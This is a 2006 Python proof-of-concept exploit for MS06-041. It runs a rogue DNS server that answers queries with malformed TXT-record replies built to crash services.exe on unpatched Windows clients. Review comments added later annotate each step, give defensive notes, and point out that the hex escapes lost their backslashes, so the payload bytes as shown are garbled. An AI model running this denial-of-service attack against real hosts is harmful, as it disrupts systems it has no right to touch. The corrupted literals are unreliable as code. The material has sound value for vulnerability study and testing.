# Title : MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)
# Published : 2006-12-09
# Author : Winny Thomas
#!/usr/bin/python
#POC for MS06-041
#Run the python script passing the local ip address as parameter. The DNS server
#will start listening on this ip address for DNS hostname resolution queries.
#This script is for testing and educational purpose and so to test this one will
#have to point the DNS resolver on the target/client to the ip address on which
#this script runs.
#Open up internet explorer and type in a hostname. services.exe will crash.
#You may have to repeat this two or three times to see the crash in services.exe
# Tested on Windows 2000 server SP0 and SP1 inside VmWare. Could not
# reproduce on SP4 though it is also vulnerable. Maybe I missed something :)
#
# For testing/educational purpose. Author shall bear no responsibility for any screw ups
# Winny Thomas ;-)
import sys
import struct
import socket
class DNSserver:
    """Minimal fake DNS responder used by the MS06-041 proof of concept.

    Binds a UDP socket on port 53 at the given local address and answers
    every query that passes the flags check in __find_type with one fixed,
    hand-built reply; the queried name itself is ignored.  The constructor
    never returns, because __create_socket enters an endless receive loop.

    Defensive context: the client-side fix is the vendor patch for the
    bulletin named in the title; on the wire the observable artefact is a
    host listening on UDP/53 and answering every query with the same record
    set.

    NOTE(review): the listing has lost its indentation and, by the look of
    the literals ('x85x80' where '\\x85\\x80' would be expected), the
    backslashes of its hex escapes in transcription.  The code below keeps
    every token as the page shows it; only the indentation is restored so
    it reads as Python.  It is Python 2 code (print statements, str payloads).
    """

    def __init__(self, localhost):
        # Reply buffer; rebuilt from scratch for every query in __send_response.
        self.response = ''
        # Blocks forever -- see the while loop in __create_socket.
        self.__create_socket(localhost)

    def __create_socket(self, localhost):
        """Bind a UDP/53 socket on *localhost* and serve queries until killed.

        Binding port 53 normally needs elevated privileges.  There is no error
        handling: a failed bind (port in use, no privilege) raises socket.error
        straight out of the constructor.
        """
        self.host = localhost
        self.port = 53
        self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.DNSsocket.bind((self.host, self.port))
        print 'Awaiting DNS queries'
        print '====================n'
        # Endless serve loop, one datagram per iteration; never exits normally.
        while 1:
            self.__await_query()

    def __await_query(self):
        """Receive one datagram and hand it to __find_type.

        The first two bytes of a DNS message are the transaction ID; they are
        saved so the reply can echo them, and the remainder is passed on.
        NOTE(review): nothing checks the datagram length.  A datagram shorter
        than four bytes makes struct.unpack in __find_type raise struct.error,
        which is uncaught and therefore ends the serve loop.
        """
        self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
        print 'Query from: ' + str(self.Addr)
        self.TransactID = self.Query[0:2]
        self.__find_type(self.Query[2:])

    def __find_type(self, Question):
        """Decide whether to answer; *Question* is the message minus its transaction ID.

        Question[0:2] are message bytes 2-3, i.e. the DNS header flags word
        (not the question type, despite the name qType).  0x0100 == 256 is the
        flags value of an ordinary recursive standard query, so presumably
        this is a crude "is this a normal query" filter: anything with other
        flag bits set gets no reply.  Question[10:-4] starts at message offset
        12 (just after the fixed 12-byte header) and drops the last four
        bytes, which for a single-question query with nothing after it is the
        QTYPE/QCLASS pair -- leaving the encoded query name.
        """
        qType = struct.unpack('>H', Question[0:2])
        if qType[0] == 256:
            self.__send_response(Question[10:-4])

    def __send_response(self, sName):
        """Assemble the fixed reply and send it back to the querying address.

        *sName* (the query name) is received but not used: the line that would
        copy it in is commented out, so the reply always carries the
        hard-coded name below.  The layout follows the DNS message format --
        12-byte header, one question, then the resource records the header
        counts announce (2 answers, 1 authority, 0 additional).  The inline
        comments on each line are the author's.

        NOTE(review): as written the literals are plain ASCII text (no
        backslashes), so the datagram actually sent is not a well-formed
        DNS message at all; see the class docstring.
        """
        self.response = self.TransactID  # echo the query's transaction ID
        self.response += 'x85x80' #Flags
        self.response += 'x00x01' #Questions
        self.response += 'x00x02' #Answer RR's
        self.response += 'x00x01' #Authority RR
        self.response += 'x00x00' #Additional RR
        #QUERIES
        #self.response += sName
        self.response += 'x04x74x65x73x74x07x68x61x63x6bx65'
        self.response += 'x72x73x03x63x6fx6dx00'
        self.response += 'x00xff' #request all records
        self.response += 'x00x01' #inet class
        #ANSWERS
        #A record
        self.response += 'xc0x0cx00x01x00x01x00x00x00x07'
        self.response += 'x00x04xc0xa8x00x02' #A type record (IP add)
        #TXT record
        self.response += 'xc0x0cx00x10x00x01x00x00x00x07'
        self.response += 'x00x18' #TXT record length (0x18 == 24, matching the bytes that follow)
        self.response += 'x08x50x52x4fx54x4fx43x4fx4c'
        self.response += 'x00' #Zero length TXT RDATA
        self.response += 'x00' #Zero length TXT RDATA
        self.response += 'x08x50x52x4fx54x4fx43x4fx4c'
        self.response += 'x00' #Zero length TXT RDATA
        self.response += 'x00' #Zero length TXT RDATA
        self.response += 'x01x41'
        #Authoritative Nameservers
        self.response += 'xc0x11x00x02x00x01x00x01x51x80'
        self.response += 'x00x0bx08x73x63x6fx72x70x69x6f'
        self.response += 'x6exc0x11'
        # Reply goes to whoever sent the query; the parentheses around
        # self.Addr are redundant (not a tuple).
        self.DNSsocket.sendto(self.response, (self.Addr))
if __name__ == '__main__':
    # Entry point: the single positional argument is the local address the
    # responder binds to.  Missing argument -> usage text on stdout, exit -1.
    if len(sys.argv) < 2:
        usage = 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
        sys.stdout.write(usage + '\n')
        sys.exit(-1)
    localhost = sys.argv[1]
    # Never returns: the serve loop runs inside the constructor.
    D = DNSserver(localhost)